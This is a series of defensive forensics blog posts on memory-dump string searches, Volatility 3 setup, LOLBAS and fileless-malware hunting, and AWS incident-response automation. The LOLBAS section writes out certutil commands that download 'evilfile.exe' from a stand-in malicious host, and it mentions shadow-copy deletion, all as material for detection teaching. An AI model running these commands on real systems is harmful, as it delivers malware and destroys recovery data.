This extracts any printable characters from the memory dump (mem.dump) and filters the results for the IP range 192.168.0.*.
Example for a filename:
strings mem.dump | grep -i akash\.exe
Here, it searches for the filename akash.exe within the memory dump.
Note: With bstrings.exe on Windows, the same searches work without escape characters (\), so you can type the IP address or filename directly: 192.168.0 or akash.exe.
-----------------------------------------------------------------------------------------------
2. Contextual Search
Finding an IOC in a memory dump is only the beginning. To understand the context in which the IOC appears, you may want to see the lines surrounding the match. This can give insights into related processes, network connections, or file paths.
strings <file> | grep -i -C5 <pattern>
Example:
strings mem.dump | grep -i -C5 akash.exe
The -C5 option tells grep to show five lines above and five lines below the matching IOC (akash.exe). This helps you investigate the surrounding artifacts and provides additional context for analysis.
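When you have more than one IOC, the same search is easy to repeat in a loop. A minimal bash sketch reusing the example image and IOCs from above:

# Sweep one memory image for a list of IOCs, keeping five lines of context per hit
for ioc in 'akash.exe' '192.168.0.'; do
    echo "=== $ioc ==="
    strings mem.dump | grep -i -C5 "$ioc"
done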
-----------------------------------------------------------------------------------------------
3. Advanced Usage with Offsets
When you use strings alongside Volatility (another powerful memory forensics tool), it's essential to retrieve offsets. Offsets let you pinpoint the exact location of an artifact within the memory image, which is vital for correlating with other forensic evidence.
strings -tx <file> | grep -i -C5 <pattern>
Example:
strings -tx mem.dump | grep -i -C5 akash.exe
The -tx option prints the hexadecimal offset of each match within the file, allowing more precise analysis, especially when working with memory analysis tools like Volatility.
-----------------------------------------------------------------------------------------------
Using Bstrings.exe in Windows
The bstrings.exe tool operates like strings but is designed for Windows and includes advanced features such as regex support and output saving.
Basic Operation
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls <search_string>
This extracts printable characters from the specified memory dump and searches for a specific pattern or IOC.
Example:
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --ls qemu-img-win-x64-2_3_0.zip
-----------------------------------------------------------------------------------------------
Regex Support
Bstrings offers regex pattern matching, allowing flexible searches. This is especially useful for patterns like email addresses, MAC addresses, or URLs.
List the available regex patterns:
bstrings.exe -p
Apply a regex pattern, here for MAC addresses:
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" --lr mac
-----------------------------------------------------------------------------------------------
Saving the Output
Forensic investigators often need to save results for later review or reporting. Bstrings makes this easy:
bstrings.exe -f "E:\ForensicImages\Memory\mem.dmp" -o output.txt
This saves the output to output.txt for future reference or detailed analysis.
-----------------------------------------------------------------------------------------------
Practical Scenarios for Memory Forensics
Corrupted Memory Image
In certain cases, memory images may be corrupted or incomplete, and tools like Volatility or MemProcFS may fail to process them. In such scenarios, strings and bstrings.exe can still be incredibly useful: they extract whatever readable data remains, allowing you to salvage critical IOCs.
Quick IOC Identification
These tools are particularly valuable for triage. During an investigation, quickly scanning a memory dump for IOCs (such as suspicious filenames, IP addresses, or domain names) can direct the next steps of the investigation. If no IOCs are found, the investigator can move on to more sophisticated or time-consuming methods.
-----------------------------------------------------------------------------------------------
Conclusion
Memory forensics is a crucial part of modern incident response, and tools like strings and bstrings.exe can significantly accelerate the process. Their ability to extract readable characters from memory dumps and apply search filters makes them invaluable, especially in cases where traditional analysis tools fail.
Key Takeaways:
Strings is ideal for Unix/Linux environments, while Bstrings is tailored for Windows.
Both tools offer powerful search capabilities, including contextual search and offset-based analysis.
Bstrings provides additional features like regex support and output saving.
These tools help quickly identify IOCs, even in challenging scenarios like corrupted memory images.
Whether you're dealing with a large memory dump or a corrupted image, these tools offer a simple yet effective way to sift through data and uncover critical forensic artifacts.
Akash Patel

  • Unveiling Volatility 3: A Guide to Installation and Memory Analysis on Windows and WSL

Today, let's dive into the fascinating world of digital forensics by exploring Volatility 3, a powerful framework for extracting crucial digital artifacts from volatile memory (RAM). Volatility enables investigators to analyze a system's runtime state, providing deep insights into what was happening at the time of memory capture.
While some forensic suites like OS Forensics offer integrated Volatility functionality, this guide shows you how to install and run Volatility 3 on Windows and WSL (Windows Subsystem for Linux). Given the popularity of Windows, it's a practical starting point for many investigators, and WSL lets you leverage Linux-based forensic tools, which can often be more efficient.
Installing Volatility 3 on Windows:
Before diving in, ensure you have three essential tools installed:
Python 3: Download Python 3 from the Microsoft Store.
Git for Windows.
Microsoft C++ Build Tools.
Once these tools are installed, follow these steps to set up Volatility 3:
Head to the Volatility GitHub repository and copy the repository link.
Open PowerShell and run: git clone <repository_link>
Check the Python version using: python -V
Navigate to the Volatility folder in PowerShell and run DIR (for Windows) or ls (for Linux).
Run the command: pip install -r .\requirements.txt
Verify the Volatility version: python vol.py -v
Extracting Digital Artifacts:
Now that Volatility is set up, you'll need a memory image to analyze. You can obtain one using tools like FTK Imager or other image capture tools.
--------------------------------------------------------------------------------------------------------
Here are a few basic commands to get you started:
python vol.py -v (displays tool information).
python vol.py -f D:\memdump.mem windows.info — provides information about the Windows system the memory was collected from. Swap windows.info for other plugins for different functionality. D:\memdump.mem is the path of the memory image.
python vol.py -f D:\memdump.mem windows.handles — lists handles in the memory image. Use -h for the help menu. The --pid parameter is significant in memory forensics: it scopes a plugin such as windows.handles to a specific process ID.
Now, you might wonder what the point of pairing PowerShell with Volatility 3 is:
python vol.py -f D:\memdump.mem windows.pslist | Select-String chrome
This showcases the use of a search string (Select-String) to filter the pslist output for specific processes like 'chrome'. While Select-String isn't part of Volatility 3 itself, combining it with the Python invocation gives functionality similar to 'grep' on Linux, letting you extract data based on defined criteria.
Few important commands:
windows.pstree (gives a hierarchy view)
windows.psscan (finds unlinked, hidden processes)
windows.netstat
windows.cmdline (shows what was run, from where it was run, and any special arguments used)
windows.malfind (for legitimate processes you will typically get nothing back)
windows.hashdump (dumps Windows password hashes)
windows.netscan
windows.ldrmodules
In windows.ldrmodules output, a "True" in a column means the DLL was present in that list, and a "False" means it was not. By comparing the columns, you can visually determine which DLLs might have been unlinked or suspiciously loaded, and hence potentially malicious; the one-liner below pulls those rows out.
More commands, with details, can be found at the link here.
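For example, reusing the Select-String trick from above to surface only the ldrmodules rows containing a False entry for manual review (a sketch; the image path is the same example as before):

python vol.py -f D:\memdump.mem windows.ldrmodules | Select-String 'False'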
-------------------------------------------------------------------------------------------------------------
Why Switch to WSL for Forensics?
As forensic analysis evolves, using the Windows Subsystem for Linux (WSL) has become a more efficient option for running tools like Volatility 3. With WSL, you can run Linux-based tools natively on your Windows machine, giving you the flexibility and compatibility benefits of a Linux environment without dual-booting or virtual machines.
Install WSL by running: wsl --install
https://learn.microsoft.com/en-us/windows/wsl/install
To install Volatility 3 on WSL:
1. Install Dependencies
Before installing Volatility 3, install the required dependencies:
sudo apt update
sudo apt install -y python3-pip python3-pefile python3-yara
2. Installing PyCrypto (Optional)
While PyCrypto was a common requirement, it is now considered outdated. If it installs, great; if not, move on:
pip3 install pycrypto
If PyCrypto doesn't install correctly, don't worry: Volatility 3 can still function effectively without it in most cases.
3. Clone the Volatility 3 Repository
Next, clone the official Volatility 3 repository from GitHub:
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
4. Verify the Installation
To confirm that Volatility 3 is installed successfully, display the help menu:
python3 vol.py -h | more
If you see the help options, your installation was successful and you're ready to begin memory analysis.
------------------------------------------------------------------------------------------------------------
Why WSL is Essential for Forensic Analysis
Forensic tools like Volatility 3 often run more smoothly in a Linux environment due to Linux's lightweight nature and better compatibility with certain dependencies and libraries. WSL lets you run a full Linux distribution natively on your Windows machine without a virtual machine or dual-booting, so you get the power and flexibility of Linux while working within your familiar Windows environment.
----------------------------------------------------------------------------------------------------
Conclusion
Forensic analysis, especially with tools like Volatility 3, becomes far more efficient when leveraging WSL. It offers better performance, compatibility with Linux-based tools, and easier maintenance than traditional Windows installations. I hope this guide has provided a clear pathway for setting up and running Volatility 3 on both Windows and WSL, empowering you to optimize your forensic workflows.
Now, you might wonder: "You've given the commands for running Volatility 3 on Windows, but what about WSL?" The good news is that the commands remain the same on WSL; the underlying process is identical, only the environment differs.
In upcoming articles, I'll cover tools like MemProcFS, Strings, and how to perform comprehensive memory analysis using all three. Until then, happy hunting and keep learning! 👋
Akash Patel

  • Fileless Malware || LOLBAS || LOLBAS Hunting Using Prefetch, Event Logs, and Sysmon

Fileless malware refers to malicious software that does not rely on traditional executable files on the filesystem, but it is important to emphasize that "fileless" does not equate to "artifactless." Evidence of such attacks often exists in various forms across the disk and system memory, making it crucial for Digital Forensics and Incident Response (DFIR) specialists to know where to look.
Key Locations for Artifact Discovery
Even in fileless malware attacks, traces can be found in several places:
Evidence of execution: Prefetch, Shimcache, and AppCompatCache
Registry keys: Large binary data or encoded PowerShell commands
Event logs: Process creation, service creation, and Task Scheduler events
PowerShell artifacts: PowerShell transcripts and PSReadLine
Scheduled Tasks: Attackers may schedule malicious tasks to persist
Autorun/Startup keys
WMI Event Consumers: These can be exploited to run malicious code without leaving typical executable traces
Example 1: DLL Side-Loading with PlugX
DLL side-loading is a stealthy technique used by malware like PlugX, where legitimate software is abused to load malicious DLLs into memory. The typical attack steps are:
Phishing email: The attacker sends a phishing email to the victim.
Decoy file and dropper: The victim opens a legitimate-looking file (e.g., a spreadsheet) that also delivers the payload.
Dropper execution: A dropper executable (e.g., ews.exe) is saved to disk, dropping several files. One of these, oinfop11.exe, is a legitimate part of Office 2003, making it appear trusted.
Malicious DLL injection: The legitimate executable loads a spoofed DLL (oinfo11.ocx), which decrypts and activates the actual malware.
At this point, the malicious DLL operates in the memory space of a trusted program, evading traditional detection mechanisms.
Example 2: Registry Key Abuse
In another example, attackers may modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. This key can be used to launch PowerShell scripts via Windows Script Host (WSH), enabling the attacker to execute code every time the system boots.
Example 3: WMI Event Filters and Fake Updaters
Attackers often leverage WMI (Windows Management Instrumentation) to create event filters that trigger malicious activities, such as launching a fake updater. In this scenario:
WMI uses regsvr32.exe to call out to a malicious site.
The malicious site hosts additional malware files, furthering the attack.
Living Off the Land (LOLBAS) Attacks
Living Off the Land Binaries and Scripts (LOLBAS) refers to legitimate tools and binaries that attackers exploit for malicious purposes, reducing the need to introduce new files to the system. This approach makes detection more challenging since the binaries are usually trusted system files.
The LOLBAS Project
The LOLBAS Project on GitHub compiles data on legitimate Windows binaries and scripts that can be weaponized by attackers. The project categorizes these tools based on their functions, including:
https://gtfobins.github.io/
https://lolbas-project.github.io/
Alternate Data Streams (ADS) manipulation
AWL bypasses (e.g., bypassing AppLocker)
Credential dumping and code compilation
Reconnaissance and UAC bypasses
Common LOLBAS in Use
Several Windows binaries are frequently misused in the wild:
CertUtil.exe
Regsvr32.exe
RunDLL32.exe
ntdsutil.exe
Diskshadow.exe
Example: CertUtil Misuse
An example of CertUtil.exe being misused involves downloading a file from a remote server.
The command used is:
certutil.exe -urlcache -split -f http[:]//192.168.182.129[:]8000/evilfile.exe goodfile.exe
Several detection points exist here:
Command-line arguments: Detect unusual arguments like urlcache using Event ID 4688 (Windows) or Sysmon Event ID 1.
File creation: Detect CertUtil writing to disk using Sysmon Event ID 11 or endpoint detection and response (EDR) solutions.
Network activity: CertUtil making network connections on non-standard HTTPS ports is unusual and should be flagged.
----------------------------------------------------------------------------------------------
1. Hunting LOLBAS Execution with Prefetch
LOLBAS (Living Off the Land Binaries and Scripts) refers to the use of legitimate binaries, often pre-installed on Windows systems, that attackers can misuse for malicious purposes. Tools like CertUtil.exe, Regsvr32.exe, and PowerShell are frequently used in these attacks. Hunting for them in enterprise environments requires collecting data from various sources, such as prefetch files, event logs, and process data.
Prefetch Hunting Tips:
Prefetch data is stored in the C:\Windows\Prefetch folder and provides insight into recently executed binaries.
Velociraptor is a great tool for collecting and analyzing prefetch files across an enterprise environment.
Running a regex search for specific LOLBAS tools such as sdelete.exe, certutil.exe, or taskkill.exe can help narrow down suspicious executions.
To perform a regex search using Velociraptor:
Step 1: Collect prefetch files.
Step 2: Apply regex filters to search for known LOLBAS tools.
Key Considerations:
Prefetch hunting can be noisy due to legitimate execution of trusted binaries.
Analyze the paths used by the binaries. For example, C:\Windows\System32\spool\drivers\color\ is commonly abused due to its write permissions.
Look for rarely seen executables or unusual paths that might indicate lateral movement or privilege escalation.
2. Intelligence Gathering: Suspicious Emails and Threat Hunts
When a suspicious email is reported, especially after an initial compromise:
SOC actions: SOC analysts may update email filters and remove copies from the mail server, but must also hunt across endpoints for signs of delivery.
Using the SHA1 hash of the malicious file can help locate copies on other endpoints. For example, you can use Velociraptor with Generic.Forensic.LocalHashes.Init to build a hash database, and then populate it with Generic.Forensic.LocalHashes.Glob.
3. Endpoint Data Hunting
Key areas for LOLBAS detection on endpoints:
Prefetch Files: As mentioned, rarely used executables like CertUtil or Regsvr32 may signal LOLBAS activity.
Running Processes: Collect processes from all endpoints. Uncommon processes, especially those tied to known LOLBAS binaries, should be investigated.
4. SIEM and Event Log Analysis
Event logs and SIEM tools offer key visibility for LOLBAS detection:
Sysmon Event 1 (Process Creation): Captures process creation events and contains critical information like command-line arguments and file hashes.
Windows Security Event 4688: Captures process creation events, and when paired with Event 4689 (process termination), provides complete context for process lifetime, which is useful for detecting LOLBAS activity.
Common LOLBAS Detection via Event Logs:
CertUtil.exe: Detect by filtering for the user agent string Microsoft-CryptoAPI/*.
PowerShell: Detect suspicious PowerShell execution using its user agent string: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.610
Microsoft BITS/* – BITS
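Tying back to the prefetch hunting above: before reaching for enterprise tooling, a quick first-pass sweep of a single host's prefetch folder is possible from PowerShell. A minimal sketch (run elevated; the name list is illustrative, not exhaustive):

# Flag prefetch entries whose names match common LOLBAS binaries
Get-ChildItem C:\Windows\Prefetch -Filter *.pf |
    Where-Object Name -match 'certutil|regsvr32|rundll32|bitsadmin|sdelete' |
    Select-Object Name, LastWriteTime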
-----------------------------------------------------------------------------------------------------------
1. Hunting Process Creation Events with Sysmon (Event ID 1)
Sysmon's Event ID 1 (Process Creation) is a critical log for detecting Living Off the Land Binaries and Scripts (LOLBAS) attacks, as it provides detailed information about processes started on endpoints. However, since LOLBAS attacks use legitimate, signed executables, it's essential to look beyond basic indicators like file hashes.
Key information from Sysmon Event ID 1 includes:
Process Hash: Helpful for detecting malicious software, but less useful for LOLBAS because the executables involved are usually Microsoft-signed binaries that are seen as legitimate.
Parent Command Line: The parent process command line can be very informative, especially when exploring more advanced attack chains. For many LOLBAS hunts, though, it may just show cmd.exe or explorer.exe, which are often the parent processes in these attacks.
2. Windows Security Event 4688 (Process Creation)
Windows Security Event 4688 is another valuable source of process creation data. For LOLBAS hunting, a few key fields in Event 4688 are particularly useful:
Parent Process: Although often cmd.exe or explorer.exe, this field can reveal whether the process was initiated by a legitimate GUI or a script, or spawned by a more suspicious process like w3wp.exe (IIS) running CertUtil.exe. A parent like IIS or a PowerShell script suggests automation or an attack executed remotely (e.g., via a webshell).
Process Command Line: Critical because it includes any arguments passed to the executable. In LOLBAS attacks, unusual command-line switches or paths used by trusted binaries (like CertUtil.exe -urlcache) can reveal malicious intent.
Token Elevation Type:
%%1936: Full token with all privileges, suggesting no UAC restriction.
%%1937: Elevated privileges, indicating that a user explicitly ran the application with "Run as Administrator."
%%1938: Normal user privileges.
These indicators help establish whether the binary was executed with elevated permissions, which could hint at privilege escalation attempts.
3. Windows Firewall Event Logs for LOLBAS Detection
Firewall logs can provide additional information about LOLBAS activity, particularly for network-based attacks. Events such as 5156 (allowed connection) or 5158 (port binding) can help spot outbound connections initiated by LOLBAS binaries like CertUtil.exe or Bitsadmin.exe.
Key fields in firewall logs:
Process ID/Application Name: Tells you which binary initiated the network connection. Tracking legitimate but rarely used binaries (e.g., CertUtil) making outbound connections to unusual IP addresses can indicate an attack.
Destination IP Address: Correlating this with known-good IPs or threat intelligence data is critical to confirm whether the connection is benign or suspicious.
4. Event Log Analysis for LOLBAS
For deeper LOLBAS detection, multiple event logs should be analyzed together:
4688: Logs the start of a process (the key event for initial execution detection).
4689: Logs the end of a process, providing insight into how long the process ran and whether it completed successfully.
5156 and 5158: Track firewall events, focusing on port binding and outbound connections. Any outbound traffic initiated by unusual executables like Bitsadmin.exe or CertUtil.exe should be scrutinized.
5. Detecting Ransomware Precursors with LOLBAS
Many ransomware attacks involve LOLBAS commands to weaken defenses or prepare the environment for encryption:
Disabling security tools: Commands like taskkill.exe or net stop are used to terminate processes that protect the system.
Firewall/ACL modifications: netsh.exe might be used to modify firewall rules to allow external connections.
Taking ownership of files: This ensures the ransomware can encrypt files unhindered.
Disabling backups/Volume Shadow Copies: Commands like vssadmin.exe delete shadows are common, to prevent file recovery.
Since these activities involve legitimate system tools, auditing these actions can serve as an early warning.
6. Improving Detection with Windows Auditing
For better detection of LOLBAS attacks and ransomware precursors, implement the following Windows auditing settings:
Process Creation Auditing:
Auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
This ensures that every process creation event is logged, which is crucial for identifying LOLBAS activity.
Command Line Auditing:
reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1
Enabling command-line logging is crucial because LOLBAS binaries often need unusual arguments to perform malicious actions.
PowerShell Logging:
reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1
reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1
PowerShell script block logging captures the full content of commands executed within PowerShell, which is a key LOLBAS tool used in many attacks.
7. Sysmon: Enhanced Visibility for LOLBAS
Deploying Sysmon enhances your visibility into system activity, especially for LOLBAS detection:
File Hashes: Sysmon captures the hash of the executing file. This is less helpful for LOLBAS, as these files are usually legitimate, but combined with process execution data it can still provide context.
Process Command Line: Sysmon logs detailed command-line arguments, which are crucial for spotting LOLBAS attacks. Rarely used switches or network connections from unexpected binaries are a red flag.
Because Sysmon captures more detailed process creation data than Windows Security Events, it's a preferred tool for more advanced hunting, especially against stealthy attacks involving LOLBAS tools.
8. Sigma Rules for LOLBAS Detection
Sigma rules provide a framework for creating reusable detection logic that works across different platforms and SIEM solutions. Using Sigma, you write detection logic in a human-readable format and then convert it into SIEM-specific queries with tools like Uncoder.io.
Advantages of Sigma:
Detection logic is SIEM-agnostic, so you can keep the same detection rules even if your organization switches SIEM platforms.
Sigma rules integrate easily with Sysmon, Windows Security Events, and other logging tools, making them highly adaptable.
By using Sigma for LOLBAS detection, you ensure consistent alerts across all environments.
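For instance, a minimal Sigma rule for the CertUtil abuse discussed next might look like the sketch below. This is illustrative only; the field names follow the standard Sysmon process_creation logsource convention, and you would tune the condition against your own baseline before deploying:

title: CertUtil URLCache Download
status: experimental
description: Detects certutil.exe being used to fetch a remote file
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains: 'urlcache'
  condition: selection
level: high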
9. Practical Example of LOLBAS Detection: CertUtil
Here's an example of how CertUtil.exe might be used in an attack:
certutil.exe -urlcache -split -f http[:]//malicious-site[.]com/evilfile.exe goodfile.exe
This command downloads a file from a remote server and stores it on the local system. While CertUtil is a legitimate Windows tool for managing certificates, it can be misused for file downloads.
Sysmon Event 1: Captures the process command line, where the -urlcache argument, rare in normal usage, stands out.
Firewall Event 5156: Logs the connection attempt from CertUtil.exe to the malicious IP.
Security Event 4688: Logs the creation of CertUtil.exe, providing the process ID and command-line arguments.
Conclusion:
Effectively hunting LOLBAS and fileless malware requires a combination of detailed event logging, process monitoring, prefetch analysis, and centralized log management. By leveraging tools like Sysmon, Velociraptor, and Sigma, organizations can strengthen their detection capabilities and proactively defend against stealthy attacks that rely on legitimate system tools to evade traditional security measures.
Akash Patel

  • Leveraging Automation in AWS for Digital Forensics and Incident Response

For those of us working in digital forensics and incident response (DFIR), keeping up with the cloud revolution can feel overwhelming at times. We're experts in tracking down security incidents and understanding what went wrong, but many of us aren't DevOps engineers by trade. That's okay; it's not necessary to become a full-time cloud architect to take advantage of the powerful automation tools and workflows available in platforms like AWS. Instead, we can collaborate with engineers and developers who specialize in these areas to create effective, scalable solutions that align with our needs.
-----------------------------------------------------------------------------------------------------------
Getting Started with Cloud-Based Forensics
For those who are new to the cloud or want a quick start to cloud forensics, Amazon Machine Images (AMIs) are a great option. AMIs are pre-configured templates that contain the information required to launch an instance. If you're not yet ready to build your own custom AMI, there are existing ones you can use.
SIFT (SANS Investigative Forensic Toolkit) is a popular option for forensic analysis and is available as an AMI. While it's not listed on the official AWS Marketplace, you can find the latest AMI IDs on the GitHub page and launch them from the EC2 console.
https://github.com/teamdfir/sift#aws
Security Onion is another robust tool for network monitoring and intrusion detection. They publish their releases as AMIs, although there's a small charge to cover regular update services. If you want full control, you can build your own AMI from their free distribution.
As your team grows its cloud forensics capabilities, you may want to create custom AMIs to fit specific use cases. EC2 Image Builder is a helpful AWS service that makes it easy to create and update AMIs, complete with patches and any necessary updates. This ensures you always have a reliable, up-to-date image for your incident response efforts.
-----------------------------------------------------------------------------------------------------------
Infrastructure-as-Code: A Scalable Approach to Forensics Environments
As your organization expands its cloud infrastructure, it's essential to deploy forensics environments quickly and consistently. This is where Infrastructure-as-Code (IaC) comes into play. IaC lets you define and manage your cloud resources as code, making environments easily repeatable and reducing the risk of configuration drift.
One of the key principles of IaC is idempotence: no matter the current state of your environment, running the IaC script brings everything to the desired state. This makes it easier to ensure that forensic environments are deployed consistently and accurately every time.
-----------------------------------------------------------------------------------------------------------
CloudFormation and Terraform
AWS provides its own IaC tool called CloudFormation, which uses JSON or YAML files to define and automate resource configurations. AWS also offers CloudFormation templates for various use cases, including incident response workflows. These templates can be adapted to fit your specific needs, making it easy to set up response environments quickly. You can explore some ready-to-use templates:
https://aws.amazon.com/cloudformation/resources/templates/
However, if your organization operates across multiple cloud providers, such as Azure, Google Cloud, or DigitalOcean, you might prefer an agnostic solution like Terraform. Terraform, developed by HashiCorp, allows you to write a single set of scripts that can be applied to various cloud platforms, streamlining deployment across your entire infrastructure.
-----------------------------------------------------------------------------------------------------------
Automating Forensic Tasks with AWS Lambda
One of the most exciting aspects of cloud-based forensics is the potential for automation, and AWS Lambda is a key player in this space. Lambda lets you run code without provisioning servers, and it's event-driven, meaning it automatically executes tasks in response to certain triggers. This is perfect for incident response, where every second counts.
https://aws.amazon.com/lambda/faqs/
For example, say you've set up a write-only S3 bucket for triage data. Lambda can be triggered whenever a new file is uploaded, automatically kicking off a series of actions such as running a triage analysis script or notifying your response team. The best part is that you're only charged for execution time, not for keeping a server running 24/7.
Lambda supports multiple programming languages, including Python, Node.js, Java, Go, Ruby, C#, and PowerShell. This flexibility makes it easy to integrate with existing workflows, no matter which scripting languages you're comfortable with. (A minimal sketch of this S3-triggered pattern follows at the end of this section.)
https://github.com/awslabs/
-----------------------------------------------------------------------------------------------------------
AWS Step Functions: Orchestrating Complex Workflows
While Lambda excels at executing individual tasks, AWS Step Functions let you orchestrate complex, multi-step workflows. In the context of incident response, this means you can automate an entire forensics investigation, from capturing an EC2 snapshot to running analysis scripts and generating reports.
One example of a Step Function workflow comes from the AWS Labs project titled "EC2 Auto Clean Room Forensics". Here's how the workflow operates:
Capture a snapshot of the target EC2 instance's volumes.
Notify the team via Slack that the snapshot is complete.
Isolate the compromised EC2 instance.
Create a pristine analysis instance and mount the snapshot.
Use the AWS Systems Manager (SSM) agent to run forensic scripts on the instance.
Generate a detailed report.
Notify the team when the investigation is complete.
This kind of automation significantly speeds up the forensic process, letting your team focus on higher-level analysis rather than repetitive tasks.
-----------------------------------------------------------------------------------------------------------
Other Automation Options for Forensics in the Cloud
If you don't have the resources or time to dive deep into AWS-specific solutions, there are plenty of other automation options that work across cloud platforms. For instance, dfTimewolf, developed by Google's IR team, is a Python-based framework designed for automating DFIR workflows. It includes recipes for AWS, Google Cloud Platform (GCP), and Azure, allowing you to streamline evidence staging and processing across multiple cloud environments.
Alternatively, if you're comfortable with shell scripting and the AWS CLI, you can develop your own lightweight automation scripts. For example, Recon InfoSec has released a simple yet powerful project that ingests triage data from S3 and processes it in Timesketch. This is an excellent way to automate data handling without building a complex pipeline from scratch.
https://dftimewolf.readthedocs.io/en/latest/developers-guide.html
https://libcloud.apache.org/index.html
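To make the S3-triggered Lambda pattern described above concrete, here is a minimal sketch of a handler in Python. It only logs each uploaded triage object; the bucket wiring (the S3 event notification) and any real analysis or alerting are assumptions you would fill in for your own environment:

import urllib.parse

def handler(event, context):
    # Each record describes one object uploaded to the triage bucket
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        key = urllib.parse.unquote_plus(record["s3"]["object"]["key"])
        print(f"New triage upload: s3://{bucket}/{key}")
        # Kick off the analysis script or notify the response team here
    return {"status": "ok"}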
-----------------------------------------------------------------------------------------------------------
The Importance of Practice in Cloud Incident Response
Automation can dramatically improve your response times and overall efficiency, but it's essential to practice these workflows regularly. Cloud technology evolves rapidly, and so do the risks associated with it. By practicing response scenarios, whether with AWS Step Functions, Terraform, or even simple CLI scripts, you can identify gaps in your processes and make improvements before a real incident occurs.
AWS also provides several incident response simulations that let you practice responding to real-world scenarios. These are excellent resources for testing your workflows and ensuring that your team is always ready.
-----------------------------------------------------------------------------------------------------------
Conclusion
Stay proactive by experimenting with these technologies, practicing regularly, and continuously refining your workflows. Cloud adoption is accelerating, and with it comes the need for robust, automated incident response strategies that can keep up with this evolving landscape.
Akash Patel

  • Optimizing AWS Cloud Incident Response with Flow Logs, Traffic Mirroring, and Automated Forensics

When it comes to managing networks, whether on-premise or in the cloud, one of the biggest challenges is understanding what's happening with your traffic. That's where flow logs and traffic mirroring come in. These tools provide essential visibility into network activity, helping with everything from troubleshooting to detecting suspicious behavior.

-------------------------------------------------------------------------------------------------------------

Flow Logs: The Call Records of Your Network

Think of flow logs as the "call records" of your network. Just like a phone bill shows who called whom, at what time, and for how long, flow logs show similar information for network traffic. For example, you can track:

Which source IP is communicating with which destination IP
Ports being used
Timestamp of the traffic
Volume of data transferred

This level of detail is invaluable for general troubleshooting and for tracking unusual activity in your network. Flow logs give you a high-level summary, making it easy to see patterns and spot anomalies.

-------------------------------------------------------------------------------------------------------------

Storing and Analyzing Flow Logs

In AWS, flow logs can be stored in Amazon S3 for archiving or sent to CloudWatch Logs for real-time analysis. Sending them to CloudWatch gives you the ability to:

Query logs directly for ad-hoc analysis
Set up alerts (e.g., for detecting high bandwidth usage)

For more advanced analysis, you can export flow logs to systems like Elasticsearch or Splunk, where you can take advantage of their powerful search capabilities to dig deeper into network behavior. To get started with flow logs, check out the AWS documentation.

https://aws.amazon.com/blogs/aws/learn-from-your-vpc-flow-logs-with-additional-meta-data/

https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html

-------------------------------------------------------------------------------------------------------------

Traffic Mirroring: Dive into Network Traffic

While flow logs provide summaries, traffic mirroring lets you go a step further by capturing the actual network traffic. This is useful for tasks like network intrusion detection.

With traffic mirroring, you can copy traffic from a network interface on an EC2 instance and send it to a monitoring instance, which can be in the same VPC or even in a separate account. This is particularly helpful for security investigations. For instance, during the COVID-19 pandemic, the company CRED used traffic mirroring to enhance network inspection for employees working from home.

Traffic mirroring allows you to:

Filter traffic, so you only capture the data you need
Send traffic to a dedicated security enclave for analysis
Monitor traffic from multiple locations, even across different AWS accounts

If you're interested in setting this up, AWS has a helpful guide.

https://docs.aws.amazon.com/vpc/latest/mirroring/what-is-traffic-mirroring.html
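Both features can also be enabled programmatically. As a minimal boto3 sketch, assuming the destination bucket already exists and with a hypothetical VPC ID and bucket ARN, enabling VPC flow logs to S3 might look like this:

```python
"""Sketch: enable VPC flow logs delivered to an S3 bucket.

Assumes boto3 is installed and credentials are configured; the VPC ID
and bucket ARN are hypothetical placeholders.
"""
import boto3

ec2 = boto3.client("ec2")

response = ec2.create_flow_logs(
    ResourceIds=["vpc-0123456789abcdef0"],   # hypothetical VPC
    ResourceType="VPC",
    TrafficType="ALL",                       # ACCEPT, REJECT, or ALL
    LogDestinationType="s3",
    LogDestination="arn:aws:s3:::example-flow-log-archive",  # hypothetical bucket
)
print("Created flow log IDs:", response["FlowLogIds"])
```

Pointing LogDestinationType at "cloud-watch-logs" instead would route the same records to CloudWatch for the real-time querying and alerting described above.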
-------------------------------------------------------------------------------------------------------------

Cloud Incident Response: Why It's Different and How to Prepare

One of the golden rules of incident response (IR) in the cloud is simple: go to where the data is. Investigating incidents directly in the cloud offers significant advantages:

Faster access to data
Scalable computing resources for analyzing large datasets
Built-in automation tools to speed up the investigation

But to make the most of these benefits, you need to plan ahead. For example, ensure that your security team has access to cloud assets before an incident occurs. This avoids delays in gathering the necessary data when time is of the essence.

-------------------------------------------------------------------------------------------------------------

Gaining Access to Cloud Assets

Getting access to cloud data for incident response can be challenging if not properly planned. At a minimum, your security team should have direct communication lines with cloud administrators to quickly gain access. Better still, set up federated authentication so the security team can assume roles in AWS accounts as needed. Tools like AWS Organizations can help manage access and ensure consistent logging across accounts. Read more about preparing for cloud incidents.

https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/aws-security-incident-response-guide.html

-------------------------------------------------------------------------------------------------------------

Using the Cloud to Build Incident Response Labs

One of the exciting possibilities of using cloud infrastructure for incident response is the ability to quickly spin up investigative labs. In a cloud environment, you can:

Scale analysis hosts on demand
Quickly access network and host data
Create security enclaves (i.e., isolated AWS accounts) for storing and analyzing sensitive information

AWS Control Tower offers a framework for organizing and managing these security accounts, which act as a boundary to protect data from potential intruders in production accounts. You can even create forensic accounts specifically for investigating incidents. Additionally, tools like Velociraptor are useful for triaging data and live analysis, even in the cloud. Building out these capabilities in the cloud enables you to respond more efficiently to incidents while reducing risk. For more information, check out AWS's guidance on forensic investigation strategies.

https://docs.aws.amazon.com/prescriptive-guidance/latest/designing-control-tower-landing-zone/introduction.html

-------------------------------------------------------------------------------------------------------------

